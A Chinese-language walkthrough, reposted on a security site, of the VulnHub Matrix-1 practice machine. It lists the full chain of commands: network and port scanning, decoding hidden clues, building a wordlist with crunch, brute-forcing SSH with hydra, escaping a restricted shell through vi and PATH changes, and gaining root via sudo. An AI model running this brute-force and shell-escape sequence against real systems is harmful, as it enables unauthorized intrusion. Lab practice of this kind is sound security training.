vulnhub之Matrix-1的实践

admin 2024年11月27日10:40:59评论6 views字数 940阅读3分8秒阅读模式

本周实践的是vulnhub的Matrix-1镜像,

下载地址,https://download.vulnhub.com/matrix/Machine_Matrix.zip,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址是192.168.0.188,

vulnhub之Matrix-1的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.188,

发现靶机开了22端口的ssh服务、80和31337端口的http服务,

vulnhub之Matrix-1的实践

浏览器访问http://192.168.0.188:31337,在源码里发现base64编码,

vulnhub之Matrix-1的实践

解码echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d,

获取到Cypher.matrix,

下载wget http://192.168.0.188:31337/Cypher.matrix,

vulnhub之Matrix-1的实践

查看内容,cat Cypher.matrix,获取到brainfuck编码,

vulnhub之Matrix-1的实践

解码,获取到用户名密码guest/k1ll0rXX,

vulnhub之Matrix-1的实践

制作密码字典,crunch 8 8 -t k1ll0r%@ -o dict.txt,

对ssh服务进行密码暴破,

hydra -l guest -P dict.txt 192.168.0.188 ssh,

获取到密码k1ll0r7n,

vulnhub之Matrix-1的实践

登录靶机ssh [email protected],发现是rbash,

一顿操作逃逸到普通shell,

$PATH

/home/guest/prog

echo /home/guest/prog/*

echo $SHELL

vi

:!/bin/bash

vulnhub之Matrix-1的实践

export SHELL=/bin/bash:$SHELL

export PATH=/usr/bin:$PATH

sudo -l确认有sudo权限,

export PATH=/bin:$PATH

切换到root,sudo su,id确认没问题,

vulnhub之Matrix-1的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Matrix-1的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日10:40:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Matrix-1的实践https://cn-sec.com/archives/3433850.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息